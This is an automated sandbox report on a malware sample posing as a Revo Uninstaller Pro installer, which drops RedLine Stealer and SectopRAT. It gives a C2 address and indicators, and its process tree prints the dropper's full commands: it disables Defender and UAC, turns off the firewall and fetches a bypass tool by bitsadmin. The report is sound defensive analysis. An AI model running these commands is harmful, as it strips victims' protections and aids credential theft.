Analysis

  • max time kernel
    144s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/10/2024, 19:26

General

  • Target

    7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe

  • Size

    18.6MB

  • MD5

    7076117f0c6d84ffd59192a4b1e7208f

  • SHA1

    08b793fc796ea5ef45f5a0d3ca989d2a2852a279

  • SHA256

    621d9de231168a4edd7b0d2bfb27f24165a1996c7a540e51fa31317a506a6518

  • SHA512

    b4f30483d16a6a38afedb91bba320e051be8a0ea94ed0e23c33f4fe0828d0ff08d8a0663aea6b2c5945b9649605217722037d2d214c3167d99fc90310160ff9a

  • SSDEEP

    393216:bsPcjinkzVPjpLnWsDkCSDCe0nz5QVIGKXTpchSpMtm9LZ0+ecQwX:bgFn0DLnC0zuuGKjpch4++em

Malware Config

Extracted

Family

redline

Botnet

Main

C2

146.0.75.231:65371

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 9 IoCs
  • Modifies system executable filetype association 2 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 56 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of FindShellTrayWindow 22 IoCs
  • Suspicious use of SendNotifyMessage 20 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:676
    • C:\Users\Admin\AppData\Local\Temp\is-8GH93.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-8GH93.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp" /SL5="$502C0,18678062,848384,C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2392
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\RPKxchvc43an\5jayrzw1q.vbs"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3048
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\RPKxchvc43an\avNIprUwIk.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3928
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1808
          • C:\Windows\SysWOW64\bitsadmin.exe
            bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
            5⤵
            • Download via BitsAdmin
            • System Location Discovery: System Language Discovery
            PID:2788
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2024
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:828
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2236
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
            5⤵
            • UAC bypass
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2228
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2380
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -PUAProtection disable"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2164
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2448
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3584
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:700
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4404
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2804
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1692
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:936
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1328
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1232
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2000
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "netsh advfirewall set allprofiles state off"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3544
            • C:\Windows\SysWOW64\netsh.exe
              "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3000
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\RPKxchvc43an\main.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1692
          • C:\Windows\SysWOW64\mode.com
            mode 65,10
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3956
          • C:\ProgramData\RPKxchvc43an\7z.exe
            7z.exe e file.zip -p___________24467pwd13287pwd30257___________ -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1472
          • C:\ProgramData\RPKxchvc43an\7z.exe
            7z.exe e extracted/file_2.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2692
          • C:\ProgramData\RPKxchvc43an\7z.exe
            7z.exe e extracted/file_1.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1232
          • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
            "afcdpsrv.exe"""
            5⤵
            • Looks for VirtualBox Guest Additions in registry
            • Looks for VMWare Tools registry key
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Maps connected drives based on registry
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:3980
            • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
              "C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\RPKxchvc43an\delXPDUR9c.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5036
          • C:\Windows\SysWOW64\timeout.exe
            timeout /T 180 /NOBREAK
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:3232
      • C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
        "C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3000
        • C:\Users\Admin\AppData\Local\Temp\is-IOEEL.tmp\Revo Uninstaller Pro 4.2.3.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-IOEEL.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$301C4,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4992
          • C:\Windows\system32\rundll32.exe
            "rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
            5⤵
            • Drops file in Drivers directory
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:716
            • C:\Windows\system32\runonce.exe
              "C:\Windows\system32\runonce.exe" -r
              6⤵
              • Checks processor information in registry
              • Suspicious use of WriteProcessMemory
              PID:2812
              • C:\Windows\System32\grpconv.exe
                "C:\Windows\System32\grpconv.exe" -o
                7⤵
                  PID:4120
            • C:\Windows\system32\regsvr32.exe
              "regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s
              5⤵
              • Loads dropped DLL
              • Modifies system executable filetype association
              • Modifies registry class
              PID:3912
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:956
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:676
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:1676
    • C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe
      C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1360

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\PROGRA~1\VSREVO~1\REVOUN~1\revoflt.sys

      Filesize

      39KB

      MD5

      498c3d4d44382a96812a0e0ff28d575b

      SHA1

      c34586b789ca5fe4336ab23ad6ff6eeb991c9612

      SHA256

      23cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba

      SHA512

      ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1

    • C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

      Filesize

      14.2MB

      MD5

      dc21d689cfa1860e8820ed0ee45b1f2a

      SHA1

      acf2db6df76114601a2e58097629e0c8cbce129b

      SHA256

      01732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c

      SHA512

      a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll

      Filesize

      188KB

      MD5

      75d7bf3468669a6c3df6f4d048315128

      SHA1

      678d3b531738573520367b47c0cd52cf5e431fa0

      SHA256

      927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae

      SHA512

      9c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

      Filesize

      23.7MB

      MD5

      ddb041550a3e69764cd9d7d3de3636f3

      SHA1

      1ad9b13a6627c1e6f258951965e39ba9cfd9cb1c

      SHA256

      54e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975

      SHA512

      00498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.ini

      Filesize

      111KB

      MD5

      c37fb8c46d0281dd27768fd1101614f0

      SHA1

      03e736a49687f9ac10b35cc791e7df5b7e55f4d8

      SHA256

      ee2e68e61821054a1946efd0260f7e70c3f338765d04edca7625d05677fd980c

      SHA512

      b074f71e06c38f484573edde490f85792ada589e953e96d64188461f41e8ca4d0a90a6fc081ec36e4dc0067337abeea567c40b4e4fd89522497b1ba735262776

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.ini

      Filesize

      114KB

      MD5

      6c9dbe894ea20eb190db6b483f17030d

      SHA1

      1bac02001cba8c083b987264f1bb89b05b74155f

      SHA256

      24ffc231de9a4573b4ae743555c43dcc550ff8455ea681c788e50bda03a3a846

      SHA512

      b0941e0026ba9117d3cf846e89723dede9f9a00dde688dbf90715244cfdc38b75b579e1c02c788626b16cb6875934341fd2acb685c145389ccd629df9355f62a

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

      Filesize

      2KB

      MD5

      edc78deb34de240c787b1011161e9a4e

      SHA1

      2d31275530dce33d3bc329991c8ad59e1b303577

      SHA256

      69569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b

      SHA512

      e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

      Filesize

      9.6MB

      MD5

      1dd8459f2595e4c0603ad491590f6952

      SHA1

      607efe3c74388fb1e4b19f8f7ed2520ebfc349a1

      SHA256

      5bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d

      SHA512

      c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d

    • C:\ProgramData\RPKxchvc43an\5jayrzw1q.vbs

      Filesize

      96KB

      MD5

      c84933bcccf41369ef9ecce015b86ed0

      SHA1

      624713276ae217d8d05c03598eecd31209c7f77a

      SHA256

      ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679

      SHA512

      221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363

    • C:\ProgramData\RPKxchvc43an\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\ProgramData\RPKxchvc43an\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\ProgramData\RPKxchvc43an\avNIprUwIk.bat

      Filesize

      22KB

      MD5

      b0a7842dd51df8942bc8b837282d1c2b

      SHA1

      0e9432597657c28ca9ac766ac7bf0a903d6aeb3b

      SHA256

      4a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8

      SHA512

      b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6

    • C:\ProgramData\RPKxchvc43an\delXPDUR9c.bat

      Filesize

      111B

      MD5

      308ba58a50ffa9eabd31fdba79af6dd1

      SHA1

      29c09164facb6419f9d7f9e103f7e13bed4743a1

      SHA256

      0ef02b5ebb5f59c70722fc29651ad48a49b2b4d87f33416b1b06c8a038475243

      SHA512

      674edfeacf8c6e606a80187f95dc16abcc0804f18c2b2e81734cf4f7e6d1f68e9db5827f18107c0882506aba47485665471c37acd2b9ad50ca075eb083a9582f

    • C:\ProgramData\RPKxchvc43an\extracted\ANTIAV~1.DAT

      Filesize

      2.0MB

      MD5

      3b2c8537303cfbb12e1af76947dcb64b

      SHA1

      811cc2d3d93135896cbc0dc9bd9a0009f7b8cfd0

      SHA256

      a323f08261c4f89287f6bded51bf6b0df4f677274175885f507377191aa4a397

      SHA512

      0201bb2c2ab36a97f770169104a460c9ba388228c45db39cd91e11eebad8ea410b64af58f2e972fd20fad046ebebba3642b03c3d1e3b5639d4c9d2cb45988610

    • C:\ProgramData\RPKxchvc43an\extracted\afcdpsrv.exe

      Filesize

      826KB

      MD5

      491e4955c0b28be327ac8fb7fd90318c

      SHA1

      08e6d67458bd6922814e6b3327a6f557672d6e10

      SHA256

      d0a1a02c3caaba32b9853c28b948e2340c6a46a1dee83752bd9dff06e487b471

      SHA512

      5921316d73872e2c09f838581a186bbaebea2a81637f051ec6c6ad4a80fe9367feff0ac6faa766152184161efb030f322a3d7f8a483fddccde6143cbe19f673a

    • C:\ProgramData\RPKxchvc43an\extracted\file_1.zip

      Filesize

      631KB

      MD5

      f82ced6150c8622b3a9aad8d5fa37638

      SHA1

      592ef68d1586ea289f7422837ac207640a21bfc7

      SHA256

      eaa515d33e4290782f2acf2c6c68147f1a70e85dfbfdf2537344b83a9cc6e424

      SHA512

      f4f961606c505b8ee0ba1ec0b76f300825ba543c07590bf01a9114722bddab22b9fd671f12378874c2737ae8824c3bb10febf8ffab855c2c1b6887674eac7608

    • C:\ProgramData\RPKxchvc43an\extracted\file_2.zip

      Filesize

      2.1MB

      MD5

      3d5e062057576606e0ef486c643cfa0d

      SHA1

      19b93a4d1ba59e9c9a26c77fef6e9671b10ae51d

      SHA256

      abd1d8b19c76ce4f1430498c4cea43f79c0bb7abd624943453450a333ec68077

      SHA512

      a3aa37138855a0e4229c6ac04f7ccf80ae6a0ddcee7b694d2ca4c2b385135c62bdd206ee86239f4195b51b146a2bb3921021630f12be1f8da2ad7f284f1867c6

    • C:\ProgramData\RPKxchvc43an\file.bin

      Filesize

      2.1MB

      MD5

      b7bc1852a3be571801ba7520d3e931f6

      SHA1

      766e017bdfa254bc0873b3c2750b1929f0f92c4a

      SHA256

      462bf44bea0606e23b288a474832e78564978bac81c6931c949fdeb33c258d16

      SHA512

      8b6f9e4cab9c56e6eb39b018f69e0f1f779eb6379fcf4820a93c203dafd0de8e8c4ea4689f9201fae6da6fdd3679d60455a3a1a01317131dff728e9b4afa8a65

    • C:\ProgramData\RPKxchvc43an\main.bat

      Filesize

      416B

      MD5

      d3f072c1d50fc42f4dce34d0d1469c87

      SHA1

      378aee2439e2423efd76c5d10e5a088510a1293e

      SHA256

      325524defc2a62bed6d17fa1c2b4ed1f17fab962c819642065328e0ed1536a7d

      SHA512

      aa2733ed33e3fdae3f000fe07cfa72eeafe8a580f0b80c47ad45c28477729a365d3d64485ed566ce2dfd5d289865ee78db0f622e9586c4cf13bb25ac104f7655

    • C:\ProgramData\VS Revo Group\Revo Uninstaller Pro\revouninstallerpro4.lic

      Filesize

      64KB

      MD5

      8462a9b69c76a9603a4143d51fbc201e

      SHA1

      4473590f93f94f22c340a354516191c3c0ba6532

      SHA256

      fe4bcb4251f77375119a936c80fb36221af0c5105e840e2e115d47f96cb437c8

      SHA512

      2f02ecdb06760a093f4d8e6f04c97138695b064db8cb2dcc4af9b47c829852f38b77be9425eb2f3e3e36f85da181c116c829921fa35ae68afc57c728d5393570

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\afcdpsrv.exe.log

      Filesize

      1KB

      MD5

      e08f822522c617a40840c62e4b0fb45e

      SHA1

      ae516dca4da5234be6676d3f234c19ec55725be7

      SHA256

      bd9d5e9f7fe6fcff17d873555d4077d15f7d6cdda1183e7f7d278b735ffe1fd7

      SHA512

      894a7fb7bbc18ac6ba13378f58a7db80ad00d6080be9a66b01cae8e23e41d9d2d4cd53c1e20669356b73590c8a3ebfda4bdda3258f81240db56c4a81b7313fe4

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      6ea659acb0a828852d40f410e804642f

      SHA1

      173206c71efe72d274d2db7e60c71fdf26269710

      SHA256

      f65b6d2c24a890b57d630b9a5b45a801d466d1cbb9d03e18763ec01bf5ac76f9

      SHA512

      c0ce295275242d35db00bc0387eeaf301acdeaa70418e591ab37e8dfcbf13315c3b30ad9e59d85ebf9f4dc3e825b2fdc28fd812ef25c3e38d26889bf8e3f2ea9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      fe6c61baedf3a21ff896aef03a05294d

      SHA1

      3a9499d6dd7b3f9048375a35d77302a355530706

      SHA256

      b50d55ab16b7cc321f93c495171158eeb5221236290cc59fed68404bf1c7d070

      SHA512

      0e0ec391ccaaf46ff13cc70f06d0630d6461c3e8d799d2199913d2cb1cbd37f7dbf589edc1e99bdbd8ecd03175eb7c9b35e03d41387ae982b3e2c46dd59212f8

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      f1bc9bba79cb2f62847a1355b016539c

      SHA1

      34abf3b33d6958de9781253588fe95cc76f3dffb

      SHA256

      bc04dfad8d9292009fe78fafd6c446bb18cf8f3d884167bd7c96e8cf46f9d036

      SHA512

      5f86205a419a012220b2744d71399f6bd10ce323a660384174d0a835b7ffbe9fa74c6a41c5b0cc88cc1c7aff0d5d0715a08dbf5b9f00a63f3a4352191b1d92a0

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      d4952a5a8d4f12eadcffe8e54f0a9c4b

      SHA1

      f04a13c6a64817c9fa6f938a96103620b1765f39

      SHA256

      4864b5a44aea983d5d9a1fba94617100c392efb8c744e5733323e8327d73a97c

      SHA512

      38a871992240068be9a941ae7cc22bb8f42de044e9176f3567fca8c08773be4a27f7f517f04872f201c497e43cbe9ad260312ea8a84aa8ce1ff2309a15243f72

